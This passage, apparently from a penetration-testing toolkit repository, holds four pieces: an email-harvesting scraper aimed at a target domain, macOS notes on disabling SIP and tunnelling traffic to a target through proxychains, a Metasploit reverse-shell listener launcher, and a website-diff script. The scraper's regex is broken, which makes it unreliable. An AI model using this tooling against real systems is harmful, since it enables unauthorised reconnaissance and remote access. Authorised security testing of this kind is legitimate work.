10.255.255.255 16,777,216 1 single Class A 40 | B 172.16.0.0 172.31.255.255 1,048,544 16 contiguous Class Bs 41 | C 192.168.0.0 192.168.255.255 65,534 256 contiguous Class Cs 42 | -------------------------------------------------------------------------------- /mods/goog-mail.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python3 2 | 3 | import http.client 4 | import re 5 | import string 6 | import sys 7 | import urllib.request 8 | import urllib.parse 9 | 10 | 11 | def StripTags(text): 12 | finished = 0 13 | while not finished: 14 | finished = 1 15 | start = text.find(b"<") 16 | if start >= 0: 17 | stop = text[start:].find(b">") 18 | if stop >= 0: 19 | text = text[:start] + text[start+stop+1:] 20 | finished = 0 21 | return text 22 | 23 | 24 | if len(sys.argv) != 2: 25 | print("\nExtracts emails from Google results.") 26 | print("\nUsage: ./goog-mail.py ") 27 | sys.exit(1) 28 | 29 | domain_name = sys.argv[1] 30 | d = {} 31 | page_counter = 0 32 | 33 | try: 34 | while page_counter < 50: 35 | results = 'https://groups.google.com/groups?q='+str(domain_name)+'&hl=en&lr=&ie=UTF-8&start=' + repr(page_counter) + '&sa=N' 36 | request = urllib.request.Request(results) 37 | request.add_header('User-Agent', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)') 38 | opener = urllib.request.build_opener() 39 | text = opener.open(request).read() 40 | emails = re.findall(rb"([\w\.\-]+@'+domain_name+')", StripTags(text)) 41 | for email in emails: 42 | d[email] = 1 43 | uniq_emails = list(d.keys()) 44 | page_counter = page_counter + 10 45 | except IOError as e: 46 | print(e) 47 | 48 | page_counter_web = 0 49 | 50 | try: 51 | while page_counter_web < 50: 52 | results_web = 'https://www.google.com/search?q=%40'+str(domain_name)+'&hl=en&lr=&ie=UTF-8&start=' + repr(page_counter_web) + '&sa=N' 53 | request_web = urllib.request.Request(results_web) 54 | request_web.add_header('User-Agent', 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 
5.0)') 55 | opener_web = urllib.request.build_opener() 56 | text = opener_web.open(request_web).read() 57 | emails_web = re.findall(rb"([\w\.\-]+@'+domain_name+')", StripTags(text)) 58 | for email_web in emails_web: 59 | d[email_web] = 1 60 | uniq_emails_web = list(d.keys()) 61 | page_counter_web = page_counter_web + 10 62 | except IOError as e: 63 | print(e) 64 | 65 | for uniq_emails_web in list(d.keys()): 66 | print(uniq_emails_web+"") 67 | -------------------------------------------------------------------------------- /notes/osx.txt: -------------------------------------------------------------------------------- 1 | OS X 2 | 3 | 4 | # Add color to terminal 5 | 6 | sudo nano /etc/profile 7 | Add 8 | export CLICOLOR=1 9 | export LSCOLORS=ExFxBxDxCxegedabagacad 10 | ------------------------------------------------------------------------------------------------------------------------------------------------------ 11 | 12 | # Boot options 13 | 14 | c 15 | option Select boot device 16 | Apple r Recovery mode 17 | Apple s Single user mode 18 | 19 | Terminal > resetpassword 20 | ------------------------------------------------------------------------------------------------------------------------------------------------------ 21 | 22 | # Cannon 8612 UPD broadcast 23 | 24 | killall CIJScannerRegister 25 | sudo rm -rf /Library/Image\ Capture/Support/LegacyDeviceDiscoveryHelpers/ 26 | ------------------------------------------------------------------------------------------------------------------------------------------------------ 27 | 28 | # Homebrew 29 | 30 | /usr/bin/ruby -e "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/master/install)" 31 | 32 | brew install curl 33 | brew install wget --with-libressl 34 | 35 | brew install proxychains-ng 36 | nano /usr/local/etc/proxychains.conf 37 | socks5 127.0.0.1 1080 Add to the bottom 38 | 39 | ssh -D 1080 -f -C -q -N user@target 40 | proxychains4 curl http://target.com 41 | 42 | - Troubleshooting 43 | 
brew update 44 | brew update Run twice 45 | brew doctor 46 | ------------------------------------------------------------------------------------------------------------------------------------------------------ 47 | 48 | # PATH 49 | 50 | $PATH Show contents of PATH 51 | ~/.profile Edit PATH 52 | ------------------------------------------------------------------------------------------------------------------------------------------------------ 53 | 54 | # SIP 55 | 56 | Reboot > command R 57 | Terminal 58 | csrutil disable; reboot 59 | 60 | Terminal 61 | java -version 62 | More Info 63 | 64 | Reboot > command R 65 | Terminal 66 | csrutil enable 67 | reboot 68 | 69 | csrutil status 70 | System Integrity Protection status: enabled. 71 | ------------------------------------------------------------------------------------------------------------------------------------------------------ 72 | 73 | # Update locate database 74 | 75 | sudo /usr/libexec/locate.updatedb 76 | -------------------------------------------------------------------------------- /listener.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/bash 2 | 3 | clear 4 | f_banner 5 | 6 | echo -e "${BLUE}Metasploit Listeners${NC}" 7 | echo 8 | echo "1. android/meterpreter/reverse_tcp" 9 | echo "2. cmd/windows/reverse_powershell" 10 | echo "3. java/jsp_shell_reverse_tcp" 11 | echo "4. linux/x64/meterpreter_reverse_https" 12 | echo "5. linux/x64/meterpreter_reverse_tcp" 13 | echo "6. linux/x64/shell/reverse_tcp" 14 | echo "7. osx/x64/meterpreter_reverse_https" 15 | echo "8. osx/x64/meterpreter_reverse_tcp" 16 | echo "9. php/meterpreter/reverse_tcp" 17 | echo "10. python/meterpreter_reverse_https" 18 | echo "11. python/meterpreter_reverse_tcp" 19 | echo "12. windows/x64/meterpreter_reverse_https" 20 | echo "13. windows/x64/meterpreter_reverse_tcp" 21 | echo "14. 
Previous menu" 22 | echo 23 | echo -n "Choice: " 24 | read choice 25 | 26 | case $choice in 27 | 1) payload="android/meterpreter/reverse_tcp";; 28 | 2) payload="cmd/windows/reverse_powershell";; 29 | 3) payload="java/jsp_shell_reverse_tcp";; 30 | 4) payload="linux/x64/meterpreter_reverse_https";; 31 | 5) payload="linux/x64/meterpreter_reverse_tcp";; 32 | 6) payload="linux/x64/shell/reverse_tcp";; 33 | 7) payload="osx/x64/meterpreter_reverse_https";; 34 | 8) payload="osx/x64/meterpreter_reverse_tcp";; 35 | 9) payload="php/meterpreter/reverse_tcp";; 36 | 10) payload="python/meterpreter_reverse_https";; 37 | 11) payload="python/meterpreter_reverse_tcp";; 38 | 12) payload="windows/x64/meterpreter_reverse_https";; 39 | 13) payload="windows/x64/meterpreter_reverse_tcp";; 40 | 14) f_main;; 41 | *) f_error;; 42 | esac 43 | 44 | echo 45 | echo -n "LHOST: " 46 | read lhost 47 | 48 | # Check for no answer 49 | if [ -z $lhost ]; then 50 | lhost=$ip 51 | echo "[*] Using $ip" 52 | echo 53 | fi 54 | 55 | echo -n "LPORT: " 56 | read lport 57 | 58 | # Check for no answer 59 | if [ -z $lport ]; then 60 | lport=443 61 | echo "[*] Using 443" 62 | fi 63 | 64 | # Check for valid port number. 65 | if [[ $lport -lt 1 || $lport -gt 65535 ]]; then 66 | f_error 67 | fi 68 | 69 | # Check for root when binding to a low port 70 | if [[ $lport -lt 1025 && "$(id -u)" != "0" ]]; then 71 | echo "You must be root to bind to a port that low." 
72 | sleep 3 73 | f_error 74 | fi 75 | 76 | cp $discover/resource/listener.rc /tmp/ 77 | 78 | sed -i "s|aaa|$payload|g" /tmp/listener.rc 79 | sed -i "s/bbb/$lhost/g" /tmp/listener.rc 80 | sed -i "s/ccc/$lport/g" /tmp/listener.rc 81 | 82 | echo 83 | msfconsole -q -r /tmp/listener.rc 84 | -------------------------------------------------------------------------------- /misc/compare-sites.sh: -------------------------------------------------------------------------------- 1 | #!/usr/bin/bash 2 | 3 | clear 4 | 5 | break="========================================" 6 | DIR=/root/Desktop/compare-sites 7 | DIFFONLY=false 8 | 9 | usage(){ 10 | echo 11 | echo 12 | echo "Compare changes to home pages." 13 | echo 14 | echo 15 | echo "Where file contains a list of URLs to be compared." 16 | echo "Usage: $0 [options] file" 17 | echo 18 | echo "Options:" 19 | echo " -c Compare versions." 20 | echo " -o Output directory. Default: /root/Desktop/compare-sites" 21 | echo 22 | echo 23 | } 24 | 25 | ts2date(){ 26 | date -d "1970-01-01 $1 sec" 27 | } 28 | 29 | while getopts "o:c" OPTION; do 30 | case $OPTION in 31 | o) DIR="$OPTARG";; 32 | c) DIFFONLY=true;; 33 | *) echo && echo && exit;; 34 | esac 35 | done 36 | 37 | shift $(($OPTIND - 1)) 38 | FILE=$* 39 | 40 | if [ -z $FILE ]; then 41 | usage 42 | exit 43 | fi 44 | 45 | if [ ! -f $FILE ]; then 46 | echo 47 | echo 48 | echo "File does not exist." 49 | echo 50 | echo 51 | exit 52 | fi 53 | 54 | if [ ! -d $DIR ]; then 55 | mkdir $DIR 56 | fi 57 | 58 | FILEHASH=${FILEHASH%%$FILE} # remove input file name from hash string (sha256sum) 59 | HDIR="$DIR/$FILEHASH" 60 | VERSION=1 61 | 62 | while [ -f $HDIR/$VERSION ]; do 63 | VERSION=$(($VERSION + 1)) 64 | done 65 | 66 | if ! 
$DIFFONLY; then 67 | date +%s > $HDIR/$VERSION 68 | echo 69 | echo 70 | echo "Downloading:" 71 | 72 | for URL in $(cat $FILE); do 73 | HASH=$(sha256sum <<<$URL | tr -d " -") 74 | echo "[*] $URL" 75 | wget -q $URL -O $HDIR/$URL-$HASH-$VERSION 76 | done 77 | 78 | echo 79 | echo $break 80 | else 81 | VERSION=$(($VERSION - 1)) 82 | fi 83 | 84 | if [ $VERSION -gt 1 ]; then 85 | echo 86 | echo "Versions:" 87 | 88 | for ((i=1; i<=${VERSION}; i++)); do 89 | echo $i - $(ts2date $(cat $HDIR/$i)) 90 | done 91 | 92 | echo 93 | echo -n "Base version: " 94 | read A 95 | echo -n "Compare with: " 96 | read B 97 | 98 | [ -z $A ] && A="1"; 99 | [ -z $B ] && B=$VERSION 100 | 101 | for URL in $(cat $FILE); do 102 | echo 103 | echo $break 104 | echo 105 | echo -e "\e[1;34m$URL\e[0m" 106 | HASH=$(sha256sum <<<$URL | tr -d " -") 107 | diff $HDIR/$URL-$HASH-$A $HDIR/$URL-$HASH-$B | grep '